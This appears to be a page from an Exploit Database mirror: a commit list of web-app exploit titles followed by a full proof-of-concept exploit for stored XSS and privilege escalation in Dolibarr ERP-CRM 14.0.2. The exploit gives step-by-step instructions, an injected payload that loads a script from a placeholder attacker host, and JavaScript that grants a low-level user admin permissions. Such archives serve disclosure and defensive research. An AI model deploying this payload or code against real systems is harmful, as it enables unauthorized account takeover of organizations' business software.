exploit-db-mirror/exploits/php/webapps/50432.txt
Offensive Security 2ee235ed78 DB: 2021-10-21
3 changes to exploits/shellcodes

Macro Expert 4.7 - Unquoted Service Path

AssetMan 2.4a - 'download_pdf.php' Remote File Disclosure

PHP-Nuke addon Nuke Mobile Entartainment 1.0 - Local File Inclusion

xKiosk 3.0.1i - 'xkurl.php?PEARPATH' Remote File Inclusion

InstaGuide Weather Script 1.0 - 'index.php' Local File Inclusion

CMSbright - 'id_rub_page' SQL Injection

ParsBlogger - 'blog.asp' SQL Injection

Blog System 1.x - 'note' SQL Injection

PHP Joke Site Software - 'sbjoke_id' SQL Injection

PHP Classifieds ADS - 'sid' Blind SQL Injection

Softbiz Article Directory Script - 'sbiz_id' Blind SQL Injection

Storyteller CMS - 'var' Local File Inclusion

MyPhpAuction 2010 - 'id' SQL Injection

PHP Lowbids - 'viewfaqs.php' Blind SQL Injection

BetMore Site Suite 4 - 'bid' Blind SQL Injection

PHP auctions - 'viewfaqs.php' Blind SQL Injection

PHP Coupon Script 6.0 - 'bus' Blind SQL Injection
PHP Link Directory Software - 'sbcat_id' SQL Injection
PHP Classified ads software - 'cid' Blind SQL Injection
PHP Script Directory Software - 'sbcat_id' SQL Injection
PHP Link Directory Software - 'sbcat_id' SQL Injection
PHP Classified ads software - 'cid' Blind SQL Injection
PHP Script Directory Software - 'sbcat_id' SQL Injection

Weekly Drawing Contest 0.0.1 - 'Check_Vote.php' Local File Inclusion

Holtstraeter Rot 13 - 'Enkrypt.php' Directory Traversal

easyGB 2.1.1 - 'index.php' Local File Inclusion

PHPAuctions - 'viewfaqs.php' SQL Injection
SonicWall SMA 10.2.1.0-17sv - Password Reset
Dolibarr ERP-CRM 14.0.2 - Stored Cross-Site Scripting (XSS) / Privilege Escalation
2021-10-21 05:02:11 +00:00

48 lines
No EOL
2.1 KiB
Text

# Exploit Title: Dolibarr ERP-CRM 14.0.2 - Stored Cross-Site Scripting (XSS) / Privilege Escalation
# Exploit Author: Oscar Gutierrez (m4xp0w3r)
# Date: 18/10/2021
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://github.com/Dolibarr
# Tested on: Ubuntu, LAAMP
# Vendor: Dolibarr
# Version: v14.0.2
# Exploit Description:
# Dolibarr ERP & CRM v14.0.2 suffers from a stored XSS vulnerability in the ticket creation flow that allows a low level user (with full access to the Tickets module) to achieve full permissions. For this attack vector to work, an administrator user needs to copy the text in the "message" box.
# Instructions:
#1. Insert this payload in the message box when creating a ticket: "><span onbeforecopy="let pwned = document.createElement('script'); pwned.setAttribute('src', 'http://YOURIPGOESHERE/hax.js'); document.body.appendChild(pwned);" contenteditable>test</span>
#
#2. Host this file (Change the extension of the file to js and remove comments) in a remote http location of your preference.
#NOTE: The user id in /dolibarr/htdocs/user/perms.php?id=2 may vary depending on the installation so you might have to change this. In my case, I had only 2 users, user 2 being the low level user.
#
#3.Once an administrator user copies the text within the ticket the attack will launch.
function read_body(xhr) {
var data = xhr.responseXML;
var tokenizedUrl = data.getElementsByClassName("reposition commonlink")[0].href;
console.log(tokenizedUrl);
return tokenizedUrl;
}
function escalatePrivs() {
var url = read_body(xhr);
var http = new XMLHttpRequest();
http.open('GET', url);
http.onreadystatechange = function() {
if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
return;
}
};
http.send(null);
}
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
read_body(xhr);
escalatePrivs(xhr);
}
}
xhr.open('GET', '/dolibarr/htdocs/user/perms.php?id=2', true);